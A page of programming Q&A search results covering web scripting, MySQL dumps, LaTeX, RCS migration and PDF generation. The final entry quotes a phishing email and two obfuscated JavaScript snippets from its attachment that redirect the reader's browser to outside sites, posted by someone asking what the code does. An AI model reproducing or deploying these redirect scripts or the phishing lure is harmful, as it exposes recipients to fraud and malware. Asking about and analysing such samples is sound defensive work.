Search Results

Search found 17194 results on 688 pages for 'document databases'.

Page 278/688 | < Previous Page | 274 275 276 277 278 279 280 281 282 283 284 285  | Next Page >

  • Can I use Data URLs in Android 2.1's Webkit-based browser?

    - by Sven Haiges
    Hi all, I am writing a tutorial about the HTML5 Canvas for mobile and did some basic tests. While I can call the toDataURL() method on an iPhone's HTML5 canvas element, it does not seem to return the data URL on Android 2.1 (Google Nexus One) and its WebKit-based default browser. Here is the sample:

        var dataURL = canvas.toDataURL();
        var img = document.createElement('img');
        img.setAttribute('src', dataURL);
        document.getElementById('box').appendChild(img);

    This works on the iPhone: it adds a new image element with the same content as the canvas. It does nothing or fails on Android 2.1. Has anyone ever gotten this to work? I am also wondering if anyone could help me understand the WebKit build numbers and what they mean with regard to what features I can expect. For the iPhone I see a build number of 528.18; on Android 2.1's browser I see (from the user agent string) a WebKit build of 530.17. So it looks like Android 2.1's WebKit browser is more up to date, yet some features work on the iPhone's WebKit but not on Android. Does this comparison just make no sense? Thanx all!
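
    One way to see whether the problem is a missing or stubbed toDataURL() on the device (a minimal sketch I would try, not something confirmed for Android 2.1's browser; 'myCanvas' is a hypothetical id) is to feature-detect and inspect what the call actually returns:

        var canvas = document.getElementById('myCanvas');   // hypothetical canvas id
        if (canvas.toDataURL) {
            var dataURL = canvas.toDataURL();
            // Some builds return the empty data URL "data:," instead of throwing.
            if (dataURL && dataURL.indexOf('data:image') === 0) {
                var img = document.createElement('img');
                img.src = dataURL;
                document.getElementById('box').appendChild(img);
            } else {
                alert('toDataURL exists but returned: ' + dataURL);
            }
        } else {
            alert('toDataURL is not implemented in this browser');
        }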

    Read the article

  • Prototype's Ajax.Updater not actually updating on IE7.

    - by Ben S
    I am trying to submit a form using Ajax.Updater and have the result of that update a div element in my page. Everything works great in IE6, FF3, Chrome and Opera. However, in IE7 it sporadically works, but more often than not it just doesn't seem to do anything. Here's the JavaScript:

        function testcaseHistoryUpdate(testcase, form) {
            document.body.style.cursor = 'wait';
            var param = Form.serialize(form);
            new Ajax.Updater("content", "results/testcaseHistory/" + testcase, {
                onComplete: function(transport) {document.body.style.cursor = 'auto'},
                parameters: param,
                method: 'post'
            });
        }

    I've verified using alert() calls that param is set to what I expect. I've read in many places that IE7 caches aggressively and that it might be the root cause, however even after adding the following to my PHP response, it still doesn't work:

        header("Last-Modified: " . gmdate("D, d M Y H:i:s") . " GMT");
        header("Cache-Control: no-store, no-cache, must-revalidate");
        header("Cache-Control: post-check=0, pre-check=0", false);
        header("Pragma: no-cache");

    To further try to fix a caching issue I've tried adding a bogus parameter which just gets filled with a random value to have different parameters for every call, but that didn't help. I've also found this, where UTF-8 seemed to be causing an issue with IE7, but my page is clearly marked:

        <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

    Does anyone have any idea what could be wrong with IE7, as opposed to the other browsers I tested, to cause this kind of issue?
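
    Since IE7 fails silently here, it may help to attach the failure callbacks Prototype provides so the request at least reports what went wrong. A debugging sketch, assuming Prototype 1.6-style options, that would replace the new Ajax.Updater call inside testcaseHistoryUpdate:

        new Ajax.Updater("content", "results/testcaseHistory/" + testcase, {
            method: 'post',
            parameters: param,
            onComplete: function(transport) { document.body.style.cursor = 'auto'; },
            // fires for non-2xx HTTP status codes
            onFailure: function(transport) { alert('HTTP ' + transport.status + ': ' + transport.statusText); },
            // fires if the response handling itself throws (e.g. while updating the DOM)
            onException: function(requester, exception) { alert('Exception: ' + exception.message); }
        });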

    Read the article

  • Error 2020: Got packet bigger than 'max_allowed_packet' bytes when dumping table

    - by Imagineer
    I'm getting the above mentioned error when backing up with ZRM, which uses mysqldump for the backup:

        mysqldump --opt --extended-insert --single-transaction --create-options --default-character-set=utf8 --user=" " -p --all-databases "/nfs/backup/mysql01/dailyrun/20091216043001/backup.sql"
        mysqldump: Error 2020: Got packet bigger than 'max_allowed_packet' bytes when dumping table TICKET_ATTACHMENT at row: 2286

    I have increased 'max_allowed_packet' to 1G in /etc/my.cnf, which is the server setting, and for the client side I've set it by running this command:

        mysql -u -p --max_allowed_packet=1G

    And I have verified that the client and server sides have the same value. This checks the client side value, according to this forum posting http://forums.mysql.com/read.php?35,75794,261640:

        mysql> SELECT @@MAX_ALLOWED_PACKET;
        +----------------------+
        | @@MAX_ALLOWED_PACKET |
        +----------------------+
        |           1073741824 |
        +----------------------+
        1 row in set (0.00 sec)

    And this checks the server value setting:

        mysql> SHOW VARIABLES;
        | max_allowed_packet | 1073741824 |

    I have run out of ideas, and have tried searching within Experts Exchange and googling for solutions, but so far none has worked. Reference: http://dev.mysql.com/doc/refman/5.1/en/packet-too-large.html. Anyone please advise, thank you.
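
    One thing worth ruling out (an assumption on my part, since the question doesn't say which options ZRM passes through): mysqldump reads its own client-side max_allowed_packet, separate from the interactive mysql client and from the server's [mysqld] setting, so the dump can still fail even when both checks above show 1G. A sketch of the two usual ways to cover the dump client itself:

        # pass the option to mysqldump directly (ZRM would need to be configured to include it)
        mysqldump --max_allowed_packet=1G --opt --single-transaction --all-databases > backup.sql

        # or set it for every mysqldump invocation in /etc/my.cnf
        [mysqldump]
        max_allowed_packet = 1G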

    Read the article

  • JQuery Tool tips

    - by kwek-kwek
    I want to create a tooltip for an image with a link. I had it working for one, but it doesn't work with the 2nd image. Here is my sample code:

        <!-- trigger element. a regular workable link -->
        <a id="test" title="Name - Title">Name</a>
        <!-- tooltip element -->
        <div class="tooltip">
            <div><span class="name">Name</span><br />
            Title <span><a href="#">more info&raquo;</a></span></div>
        </div>

        <!-- trigger element. a regular workable link -->
        <a id="test2" title="Name - Title">Name</a>
        <!-- tooltip element -->
        <div class="tooltip2">
            <div><span class="name">Name</span><br />
            Title <span><a href="#">more info&raquo;</a></span></div>
        </div>

    And here is the script that makes it all happen:

        <script>
        // What is $(document).ready ? See: http://flowplayer.org/tools/using.html#document_ready
        $(document).ready(function() {
            // enable tooltip for "test" element. use the "slide" effect
            $("#test").tooltip({ effect: 'slide', offset: [50, 40] });
            $("#test2").tooltip2({ effect: 'slide', offset: [50, 40] });
        });
        </script>

    But it's not working, please help.
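
    Assuming this is the jQuery Tools tooltip plugin (the flowplayer.org link suggests it), there is no tooltip2() method, so the second call throws and nothing after it runs. A sketch of how both triggers could be wired with the same tooltip() call, relying on whatever the plugin already resolved for the first trigger (its title attribute or the element that follows it):

        $(document).ready(function() {
            // one call, both triggers; each <a> is followed in the markup by its own tooltip <div>
            $("#test, #test2").tooltip({ effect: 'slide', offset: [50, 40] });
        });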

    Read the article

  • Dynamically created iframe used to download file triggers onload with firebug but not without

    - by justkt
    EDIT: as this problem is now "solved" to the point of working, I am looking to have the information on why. For the fix, see my comment below.

    I have a web application which repeatedly downloads wav files dynamically (after a timeout or as instructed by the user) into an iframe in order to trigger the default audio player to play them. The application targets only FF 2 or 3. In order to determine when the file is downloaded completely, I am hoping to use the window.onload handler for the iframe. Based on this stackoverflow.com answer I am creating a new iframe each time. As long as Firebug is enabled on the browser using the application, everything works great. Without Firebug, the onload never fires. The version of Firebug is 1.3.1, while I've tested Firefox 2.0.0.19 and 3.0.7. Any ideas how I can get the onload from the iframe to reliably trigger when the wav file has downloaded? Or is there another way to signal the completion of the download? Here's the pertinent code.

    HTML (hidden's only attribute is display:none;):

        <div id="audioContainer" class="hidden">
        </div>

    JavaScript (could also use jQuery, but innerHTML is faster than html() from what I've read):

        waitingForFile = true; // (declared at the beginning of closure)
        $("#loading").removeClass("hidden");
        var content = "<iframe id='audioPlayer' name='audioPlayer' src='" + /path/to/file.wav + "' onload='notifyLoaded()'></iframe>";
        document.getElementById("audioContainer").innerHTML = content;

    And the content of notifyLoaded:

        function notifyLoaded() {
            waitingForFile = false; // (declared at beginning of the closure)
            $("#loading").addClass("hidden");
        }

    I have also tried creating the iframe via document.createElement, but I found the same behavior. The onload triggered each time with Firebug enabled and never without it.

    EDIT: Fixed the information on how the iframe is being declared and added the callback function code. No, no console.log calls here.
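
    A pattern I would try here (a sketch, not the poster's eventual fix, which isn't shown on this page; the playFile wrapper name is mine): build the iframe with document.createElement and attach the load listener programmatically before assigning src, so the handler does not depend on an inline onload attribute being parsed out of innerHTML.

        function playFile(url) {
            waitingForFile = true;                           // same flag as in the question
            $("#loading").removeClass("hidden");

            var container = document.getElementById("audioContainer");
            container.innerHTML = "";                        // drop the previous iframe, if any

            var frame = document.createElement("iframe");
            frame.id = "audioPlayer";
            // register the handler first, then start the download
            frame.addEventListener("load", function() {
                waitingForFile = false;
                $("#loading").addClass("hidden");
            }, false);
            frame.src = url;
            container.appendChild(frame);
        }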

    Read the article

  • How to migrate project from RCS to git? (SOLVED)

    - by Norman Ramsey
    I have a 20-year-old project that I would like to migrate from RCS to git, without losing the history. All web pages suggest that the One True Path is through CVS. But after an hour of Googling and trying different scripts, I have yet to find anything that successfully converts my RCS project tree to CVS. I'm hoping the good people at Stackoverflow will know what actually works, as opposed to what is claimed to work and doesn't. (I searched Stackoverflow using both the native SO search and a Google search, but if there's a helpful answer in the database, I missed it.)

    UPDATE: The rcs-fast-export tool at http://git.oblomov.eu/rcs-fast-export was repaired on 14 April 2009, and this version seems to work for me. This tool converts straight to git with no intermediate CVS. Thanks Giuseppe and Jakub!!!

    Things that did not work that I still remember:

    - The rcs-to-cvs script that ships in the contrib directory of the CVS sources
    - The rcs-fast-export tool at http://git.oblomov.eu/rcs-fast-export in versions before 13 April 2010
    - The rcs2cvs script found in a document called "CVS-RCS-HOW-TO Document for Linux"

    Read the article

  • XML generation with java, trying to copy the whole node

    - by Pawel Mysior
    I've got an XML document that is filled with people (the parent node is "students", and there are 25+ "student" nodes). Each student looks like this:

        <student>
            <name></name>
            <surname></surname>
            <grades>
                <subject name="">
                    <small_grades></small_grades>
                    <final_grade></final_grade>
                </subject>
                <subject name="">
                    <small_grades></small_grades>
                    <final_grade></final_grade>
                </subject>
            </grades>
            <average></average>
        </student>

    Basically, what I want to do (I've been asked to do) is to make a program that would get the 3 students with the best average. While parsing the document and getting the three best students isn't too difficult, the XML generation is a pain in the ass. Right now, what I'm doing is getting every single node from student and recreating it in a new file. Is there a way to copy the whole student node with everything that's in it? Regards, Paul

    Read the article

  • What can cause SQL 2008 Transaction Log Shipping to stop functioning?

    - by Rick
    I read somewhere that doing a backup, or having a Maintenance Plan run, can cause Log Shipping to stop functioning. Is this true? What should we watch out for once our Transaction Log Shipping is in place that could stop it? A Log Shipping test we were doing between two databases on the same SQL 2008 server appeared to stop working without any error. When we checked the history of the LSRestore_* job, it was always ignoring the new *.trn files. Any suggestions? Thanks.

    Read the article

  • sql and web encoding problem

    - by Marki
    Guys, I've got an encoding problem I believe. I have upgraded from phpBB2 to phpBB3. The old databases were in latin1, the new ones have utf8 encoding. Already during the upgrade process some rows of the DB were only read partly into the new version, because of strange characters as it turned out. When I use PHP's mb_convert_encoding() function to convert those strings to UTF8 they end up e.g. as 0x0093, i.e. they must have been some kind of double quotes. Even after doing this conversion, they still show up as 0x0093 in the browser (the squares with 0093 in them when the browser does not know what to display). Can someone explain the problem here? I'm a little confused and afraid I don't see all the dependencies that need to work to have the correct encodings and the correct display thereof...

    Read the article

  • How to edit CSV file without changing or formatting values (ideally in Neo/Open-Office)?

    - by Scott Saunders
    I often need to edit CSV files that will later be imported into databases. I need to reorder columns, change values, delete lines, etc. I use NeoOffice for this now - it's basically OpenOffice with some Mac UI stuff tweaked. Often, though, NeoOffice tries to be "helpful" and reformats fields it thinks are dates, rounds numbers to some number of decimals, etc. This breaks the file import and/or changes important data values. How can I prevent this from happening? I need to edit the fields exactly as they would appear in a text editor, with absolutely no changes to the data in the fields.

    Read the article

  • Investigating the root cause behind SharePoint's "request not found in the TrackedRequests"

    - by Muhimbi
    We have a long standing issue in our bug tracking system about the dreaded "ERROR: request not found in the TrackedRequests. We might be creating and closing webs on different threads." message in SharePoint's trace log. As we develop Workflow software for the SharePoint market, we look into this issue from time to time to make sure it is not caused by our products. I have personally come to the conclusion that this is a problem in SharePoint, but perhaps someone else can prove me wrong. Here is what I know:

    - According to the hundreds of search results returned by Google on this topic, this issue appears to be mainly related to SharePoint Workflows, both SharePoint Designer and Visual Studio based workflows.
    - Assuming ULS logging is set to Monitorable, the easiest way to reproduce this problem is to create a new SharePoint Designer Workflow, attach it to a document library, set it to auto start on add/update, don't add any actions, save the workflow and upload a file to the document library.
    - The error is only visible in the SharePoint trace log; it does not appear to impact the execution of the workflow at hand.
    - I have verified that the problem occurs on 32 bit as well as 64 bit systems, Win2K3 and 2K8, WSS and MOSS, with SharePoint versions up to the December 2009 Cumulative Update (6524).
    - The problem does not occur when a workflow is started manually.
    - There are dozens of related posts on MSDN Forums, hundreds on Google, one on StackOverflow and none on SharePoint Overflow. There appears to be no answer.

    Does anyone have any idea about what is going on, what is causing this and if we should worry or file this under 'Red Herrings'.

    Read the article

  • Latex renewcommand not working properly

    - by Nazgulled
    Why is this not working:

        \documentclass[a4paper,10pt]{article}
        \usepackage{a4wide}
        \usepackage[T1]{fontenc}
        \usepackage[portuguese]{babel}
        \usepackage[latin1]{inputenc}
        \usepackage{indentfirst}
        \usepackage{listings}
        \usepackage{fancyhdr}
        \usepackage{url}
        \usepackage[compat2,a4paper,left=25mm,right=25mm,bottom=15mm,top=20mm]{geometry}
        \usepackage{color}
        \usepackage[colorlinks]{hyperref}
        \usepackage[pdftex]{graphicx}

        \renewcommand{\headrulewidth}{0.4pt}
        \renewcommand{\footrulewidth}{0.4pt}
        \pagestyle{fancy}
        \fancyhead[L]{\small Laboratórios de Informática III}
        \fancyhead[R]{\small Projecto 1 (Linguagem \textsf{C})}

        \lstset{
            basicstyle=\ttfamily\footnotesize,
            showstringspaces=false,
            frame=single,
            tabsize=4,
            breaklines=true,
        }

        \definecolor{Section1}{rgb}{0.09,0.21,0.36}
        \definecolor{Section2}{rgb}{0.21,0.37,0.56}
        \definecolor{Section3}{rgb}{0.30,0.50,0.74}

        \hypersetup{
            bookmarks=false,
            linkcolor=red,
            urlcolor=cyan,
        }

        \renewcommand{\section}[1]{\texorpdfstring{\color{green}#1}{#1}}
        \parskip=6pt

        \begin{document}
        \begin{titlepage}
        \begin{center}
        \includegraphics[width=5cm]{./logo.jpg}\\[1cm]
        \textsc{\LARGE Universidade do Minho}\\[1cm]
        \textsc{\large Licenciatura em Engenharia Informática\\Laboratórios de Informática III}\\[1.5cm]
        \rule{\linewidth}{0.5mm}\\[0.4cm]
        \huge{\textbf{\textsc{Relatório do Projecto 1 (Linguagem C)}}}
        \rule{\linewidth}{0.5mm}
        \vfill
        \begin{tabular}{c c}
        \includegraphics[width=3.5cm]{./nuno.jpg} & \includegraphics[width=3.5cm]{./ricardo.jpg} \\
        \textsc{\large{Nuno Mendes (51161)}} & \textsc{\large{Ricardo Amaral (48404)}} \\
        \end{tabular}
        \vfill
        \large{\today}
        \end{center}
        \end{titlepage}

        \tableofcontents
        \newpage

        \section{Introdução}
        Lorem ipsum...

        \newpage
        \appendix
        \section{\color{Section1}Diagrama das Estruturas de Dados}
        \begin{center}
        \includegraphics[width=16cm]{./Diagrama.pdf}
        \end{center}
        \end{document}

        ! LaTeX Error: Something's wrong--perhaps a missing \item.

        See the LaTeX manual or LaTeX Companion for explanation.
        Type  H <return>  for immediate help.
        ...

        l.2 ...rline {1}\color {green}Teste}{3}{section.1}

    How can I make it work properly?

    Read the article

  • ActiveRecord table inheritance using set_table_names

    - by Jinyoung Kim
    Hi, I'm using ActiveRecord in Ruby on Rails. I have a table named documents (Document class) and I want to have another table data_documents (DataDocument class) which is effectively the same except for having a different table name. In other words, I want two tables with the same behavior except for the table name.

        class DataDocument < Document
          #set_table_name "data_documents"
          self.table_name = "data_documents"
        end

    My solution was to use class inheritance as above, yet this resulted in an inconsistent SQL statement for the create operation, in which both the 'documents' table and the 'data_documents' table appear. Can you figure out why, and how I can make it work?

        >> DataDocument.create(:did=>"dd")
        ActiveRecord::StatementInvalid: Mysql::Error: Unknown column 'data_documents.did' in 'where clause': SELECT `documents`.id FROM `documents` WHERE (`data_documents`.`did` = BINARY 'dd') LIMIT 1
            from /Users/lifidea/.gem/ruby/1.8/gems/activerecord-2.3.2/lib/active_record/connection_adapters/abstract_adapter.rb:212:in `log'
            from /Users/lifidea/.gem/ruby/1.8/gems/activerecord-2.3.2/lib/active_record/connection_adapters/mysql_adapter.rb:320:in `execute'
            from /Users/lifidea/.gem/ruby/1.8/gems/activerecord-2.3.2/lib/active_record/connection_adapters/mysql_adapter.rb:595:in `select'
            from /Users/lifidea/.gem/ruby/1.8/gems/activerecord-2.3.2/lib/active_record/connection_adapters/abstract/database_statements.rb:7:in `select_all_without_query_cache'
            from /Users/lifidea/.gem/ruby/1.8/gems/activerecord-2.3.2/lib/active_record/connection_adapters/abstract/query_cache.rb:62:in `select_all'

    Read the article

  • Concatenate javascript to a string/parameter in a function

    - by Gerry S
    I am using kottke.org's old JAH example to return some html to a div in a webpage. The code works fine if I use static text. However I need to get the value of a field to add to the string that is getting passed as the parameter to the function.

        var xmlhttp=false;
        /*@cc_on @*/
        /*@if (@_jscript_version >= 5)
        try {
            xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
        } catch (e) {
            try {
                xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
            } catch (E) {
                xmlhttp = false;
            }
        }
        @end @*/
        if (!xmlhttp && typeof XMLHttpRequest != 'undefined') {
            xmlhttp = new XMLHttpRequest();
        }

        function getMyHTML(serverPage, objID) {
            var obj = document.getElementById(objID);
            xmlhttp.open("GET", serverPage);
            xmlhttp.onreadystatechange = function() {
                if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
                    obj.innerHTML = xmlhttp.responseText;
                }
            }
            xmlhttp.send(null);
        }

    And on the page....

        <a href="javascript://" onclick="getMyHTML('/WStepsDE?open&category="+document.getElementById('Employee').value;+"','goeshere')">Change it!</a></p>
        <div id ="goeshere">Hey, this text will be replaced.</div>

    It fails (with the help of Firebug) with the getMyHTML call where I try to get the value of Employee to include in the first parameter. The error is "Unterminated string literal". Thx in advance for your help.
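
    The onclick attribute is already a JavaScript string, so the "+ ... +" concatenation and the stray semicolon inside it are what produce the unterminated string literal. A sketch of one way this is often restructured (the field id 'Employee' and the URL come from the question; the changeIt wrapper name is mine): build the URL in script rather than inside the attribute.

        function changeIt() {
            // read the field value at click time and build the request URL in one place
            var category = document.getElementById('Employee').value;
            getMyHTML('/WStepsDE?open&category=' + encodeURIComponent(category), 'goeshere');
        }

    and in the page:

        <a href="javascript://" onclick="changeIt()">Change it!</a>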

    Read the article

  • Cloud Computing - Multiple Physical Computers, One Logical Computer

    - by bundini
    I know that you can set up multiple virtual machines per physical computer. I'm wondering if it's possible to make multiple physical computers behave as one logical unit? Fundamentally the way I imagine it working is that you can throw 10 computers into a facility one day. You've got one client that requires the equivalent of two computers worth, and 100 others that eat up the remaining 8. As demands change you're just reallocating logical resources, maybe the 2 computer client now requires a third physical system. You just add it to the cloud, and don't worry about sharding the database, or migrating data over to a new server. Can it work this way? If yes, why would anyone ever do things like hand partition their database servers anymore? Just add more computing resources. You scale horizontally with the hardware, but your server appears to scale vertically. There's no need to modify your application's supporting infrastructure to support multiple databases etc.

    Read the article

  • Cloud Computing - Multiple Physical Computers, One Logical Computer

    - by Koobz
    I know that you can set up multiple virtual machines per physical computer. I'm wondering if it's possible to make multiple physical computers behave as one logical unit? Fundamentally the way I imagine it working is that you can throw 10 computers into a facility one day. You've got one client that requires the equivalent of two computers worth, and 100 others that eat up the remaining 8. As demands change you're just reallocating logical resources, maybe the 2 computer client now requires a third physical system. You just add it to the cloud, and don't worry about sharding the database, or migrating data over to a new server. Can it work this way? If yes, why would anyone ever do things like partition their database servers anymore? Just add more computing resources. You scale horizontally with the hardware, but your server appears to scale vertically. There's no need to modify your application's infrastructure to support multiple databases etc.

    Read the article

  • MySQL Linked Server and SQL Server 2008 Express Performance

    - by Jeffrey
    Hi All, I am currently trying to setup a MySQL Linked Server via SQL Server 2008 Express. I have tried two methods, creating a DSN using the mySQL 5.1 ODBC driver, and using Cherry Software OLE DB Driver as well. The method that I prefer would be using the ODBC driver, but both run horrendously slow (doing one simple join takes about 5 min). Is there any way I can get better performance? We are trying to cross query between multiple mySQL databases on different servers, and this seems to be method we think would work well. Any comments, suggestions, etc... would be greatly appreciated. Regards, Jeffrey

    Read the article

  • "User Friendly" .net compatible Regex/Text matching tools?

    - by Binary Worrier
    Currently in our software we provide a hook where we call a DLL built by our clients to parse information out of documents we are processing (the DLL takes in some text (or a file) and returns a list of name/value pairs). e.g. We're given a Word doc or text file to archive. We do various things to the file, and call a DLL that will return "pertinent" information about the file. Among other things we store that "pertinent" data for posterity. What is considered "pertinent" depends on the client and the type of the document; we don't care, we get it and store it. I've been asked to develop a user friendly "something" that will allow a non-programmer user to "configure" how to get this data from a plain text document (<humor>The user story ends with the helpful suggestion/query "We could use regex for this?"</humor>) It's safe to assume that a list of regex's isn't going to cut this: I've written some of these parsers for customers, the regex's to do these would be hideous, and some of them can't be done by regex's at all. Also one of the requirements above is "user friendly", which negates anything that has users seeing or editing regex expressions. As you can guess, I don't have a fortune of time to do this, and am wondering is there anything out there that I can plug in to our app that has a nice front end and does exactly what I need? :) No? Whadda mean no! . . . sigh Ok then failing that, is there anything out there that "visually" builds regex's and/or other pattern matching expressions, and then allows one to run those expressions against some text? The MS BRE will do what I want, but I need something prettier that looks less like code. Thanks guys,

    Read the article

  • Dashcode code translation

    - by Alex Mcp
    Hi, a quick, probably easy question whose answer is probably "best practice". I'm following a tutorial for a custom-template mobile Safari webapp, and to change views around this code is used:

        function btnSave_ClickHandler(event) {
            var views = document.getElementById('stackLayout');
            var front = document.getElementById('mainScreen');
            if (views && views.object && front) {
                views.object.setCurrentView(front, true);
            }
        }

    My question is just about the if conditional statement. What is this triplet saying, and why does each of those things need to be verified before the view can be changed? Does views.object just test to see if the views variable responds to the object method? Why is this important?

    EDIT - This is/was the main point of this question, and it regards not Javascript as a language and how if statements work, but rather WHY these 3 things specifically need to be checked: Under what scenarios might views and front not exist? I don't typically write my code so redundantly. If the name of my MySQL table isn't changing, I'll just say UPDATE 'mytable' WHERE... instead of the much more verbose (and in my view, redundant)

        $mytable = "TheSQLTableName";
        if ($mytable == an actual table && $mytable exists && entries can be updated){
            UPDATE $mytable;
        }

    Whereas if the table's name (or in the JS example, the view's names) ARE NOT "hard coded" but are instead a user input or otherwise mutable, I might write my code as the DashCode example has it. So tell me, can these values "go wrong" anyhow? Thanks!
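
    For what it's worth, my reading of that guard (an interpretation, not taken from the Dashcode documentation) is that each operand covers a different way the call could blow up, and writing it long-hand shows which:

        var views = document.getElementById('stackLayout');   // null if no element with id "stackLayout" is in the page yet
        var front = document.getElementById('mainScreen');    // null if the front view is missing or its id was changed
        if (views) {                  // the stack layout element was found
            if (views.object) {       // Dashcode has attached its part controller to the element, so setCurrentView exists
                if (front) {          // there is actually a view to switch to
                    views.object.setCurrentView(front, true);
                }
            }
        }

    Without the middle check, calling setCurrentView before the part's controller is initialized (or after an id is renamed in the template) would throw instead of silently doing nothing.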

    Read the article

  • Slight network lag on Small Business Server 2008 R2

    - by Sir.Nathan Stassen
    I recently upgraded a network from a SBS 2003 server to a SBS 2008 R2 server. Both I and users have noticed a slight delay in network applications and browsing network drives on the new server. It is minor, maybe a second or two at most. However, I am wondering if anyone knows of any way to optimize the networking to service requests to the workstations sooner. The network is running at 1 gig with some 100 meg devices (mainly network printers). All workstations are XP SP3. Network software runs out of a shared folder mapped as a network drive, no SQL databases. The server is a Dell PowerEdge T610 with plenty of RAM, CPU power, and storage.

    Read the article

  • Can pdflatex (or any tex package) automatically rescale included images which have been reduced in size?

    - by drfrogsplat
    I'm writing my thesis in LaTeX, generating it with pdflatex. I have a large number of figures, many of which are bitmaps (as opposed to SVG) in PNG/JPEG format. I've generally created them to be fairly high resolution (say 1600x1200-ish) to ensure that whatever size they end up in the document, they'll be at least 300dpi when printed. As I'm writing/laying out the document, I'm including graphics (using \includegraphics from the graphicx package) and setting widths/heights as appropriate (e.g. subfigures are quite small). I don't need the images to be any more than about 300 dpi at best, so where I have shrunk a 1600x1200 image down to say 5cm, the image is now at 800 dpi. So despite including some very small (on the page) images, the PDF is becoming quite large. Is there a way to tell pdflatex or graphicx (or something else involved?) to convert all images to a maximum of 300 dpi, based on the dimensions I'm setting with say \includegraphics[width=2in]{filename}? i.e. so it scales the image to a max of 600x600 pixels as it includes it in the PDF (leaving the original file untouched). I know I can resize the original images with various command line applications, and include the pre-resized versions, but given the images vary in size considerably, it wouldn't be as simple as making sure they're all 300dpi for a constant printed size. It'd also be nice to be able to easily create different versions of PDFs (web vs final print) without resizing images manually, so that the 'web' PDF capped images at say 72-100 dpi while the final print one could cap at 600 (if at all).

    Read the article

  • Problems with registering click event listener to a frame-element

    - by distractedBySquirrels
    Hi everybody, I ran into a problem with adding an event listener. I wrote a Firefox plugin a while ago for my bachelor thesis. It was based on a different attacker model than you would normally expect. In this scenario the attacker is the service provider (like Facebook, Google, ...), who reads all your private data stored on their site (via JS). My final solution was to temporarily allow JS (while the page loads and after a user action occurred). To observe the interaction I used event listeners, which worked very well so far. But last week I noticed that my approach doesn't work with web sites which use a frameset (I added the event listener to the body...). So I tried to add the listener to the frameset, respectively to the frame. But the clicks are only noticed when you actually click on the frame itself... (e.g. resize the frame with your mouse) But I want to register clicks on the document loaded inside the frame. I already tried .frameElement. Sadly it seems that Firefox doesn't like me (or, which is more likely, I'm too stupid :) ) and claims there are no frames... Could anyone tell me how to add an event listener to the document inside a frame? The web site looks like this:

        <html>
        <head>
            <title>Frameset Test</title>
        </head>
        <frameset cols="150,*">
            <frame src="nav.html" name="Navigation">
            <frame src="main.html" name="Main">
        </frameset>
        </html>

    This was my first bigger project with Mozilla so this could be a really dumb failure of mine... I hope you guys can help me. Thanks in advance. Sebastian
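
    A sketch of the usual way to reach the inner documents from the top-level page (assuming same-origin frames; the frame names come from the markup above): wait for the frames to load, then register the listener on the frame's document rather than on the frameset.

        window.addEventListener('load', function() {
            // frames[] is indexed by the name attribute of each <frame>
            var inner = window.frames['Main'].document;
            inner.addEventListener('click', function(event) {
                // clicks anywhere inside main.html arrive here;
                // event.target is the element that was clicked in the inner document
            }, false);
        }, false);

    From extension code the same idea applies to the content window's frames collection, though the details depend on how the add-on gets hold of the page's window.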

    Read the article

  • Bloated PDF created by TCPDF

    - by Yogi Yang 007
    In a web app developed in PHP we are generating quotations and invoices (which are very simple and of a single page) using the TCPDF lib. The lib is working just great, but it seems to generate very large PDF files. For example, in our case it is generating PDF files as large as 4 MB (+/- a few KB). How to reduce this bloating of PDF files generated by TCPDF? Here is the code snippet that I am using:

        ob_start();
        include('quote_view_bag_pdf.php'); //This file is valid HTML file with PHP code to insert data from DB
        $quote = ob_get_contents(); //Capture the content of 'quote_view_bag_pdf.php' file and store in variable
        ob_end_clean();

        //Code to generate PDF file for this Quote
        //This line is to fix a few errors in tcpdf
        $k_path_url='';
        require_once('tcpdf/config/lang/eng.php');
        require_once('tcpdf/tcpdf.php');

        // create new PDF document
        $pdf = new TCPDF();

        // remove default header/footer
        $pdf->setPrintHeader(false);
        $pdf->setPrintFooter(false);

        // add a page
        $pdf->AddPage();

        // print html formated text
        $pdf->writeHtml($quote, true, 0, true, 0);
        //Insert Variables contents here.

        //Build Out File Name
        $pdf_out_file = "pdf/Quote_".$_POST['quote_id']."_.pdf";

        //Close and output PDF document
        $pdf->Output($pdf_out_file, 'F');
        $pdf->Output($pdf_out_file, 'I');

    Hope this code fragment will give some idea?

    Read the article

  • Ecommerce Database DNS Switch

    - by KThompson
    Hello, I am moving an e-commerce site to a new server. All has been successful and it's time to change the DNS for the domain. It's a relatively popular site and I fear that during propagation orders will be split between the old database and the new one. The databases do contain content that is dependent on the server it is on (cache path, upload directory, etc.) so I can't just point the old site to the new database. Are there any solutions to this without any of the sites going down? Thanks in advance

    Read the article

  • What does this Javascript do?

    - by nute
    I've just found out that a spammer is sending email from our domain name, pretending to be us, saying:

        Dear Customer,
        This e-mail was send by ourwebsite.com to notify you that we have temporanly prevented access to your account.
        We have reasons to beleive that your account may have been accessed by someone else. Please run attached file and Follow instructions.
        (C) ourwebsite.com

    (I changed that) The attached file is an HTML file that has the following javascript:

        <script type='text/javascript'>function mD(){};this.aB=43719;mD.prototype = {i : function() {var w=new Date();this.j='';var x=function(){};var a='hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'.replace(/[gJG,\<]/g, '');var d=new Date();y="";aL="";var f=document;var s=function(){};this.yE="";aN="";var dL='';var iD=f['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')];this.v="v";var q=27427;var m=new Date();iD['hqrteqfH'.replace(/[Htqag]/g, '')]=a;dE='';k="";var qY=function(){};}};xO=false;var b=new mD(); yY="";b.i();this.xT='';</script>

    Another email had this:

        <script type='text/javascript'>function uK(){};var kV='';uK.prototype = {f : function() {d=4906;var w=function(){};var u=new Date();var hK=function(){};var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');var n=new Array();var e=function(){};var eJ='';t=document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];this.nH=false;eX=2280;dF="dF";var hN=function(){return 'hN'};this.g=6633;var a='';dK="";function x(b){var aF=new Array();this.q='';var hKB=false;var uN="";b['hIrBeTf.'.replace(/[\.BTAI]/g, '')]=h;this.qO=15083;uR='';var hB=new Date();s="s";}var dI=46541;gN=55114;this.c="c";nT="";this.bG=false;var m=new Date();var fJ=49510;x(t);this.y="";bL='';var k=new Date();var mE=function(){};}};var l=22739;var tL=new uK(); var p="";tL.f();this.kY=false;</script>

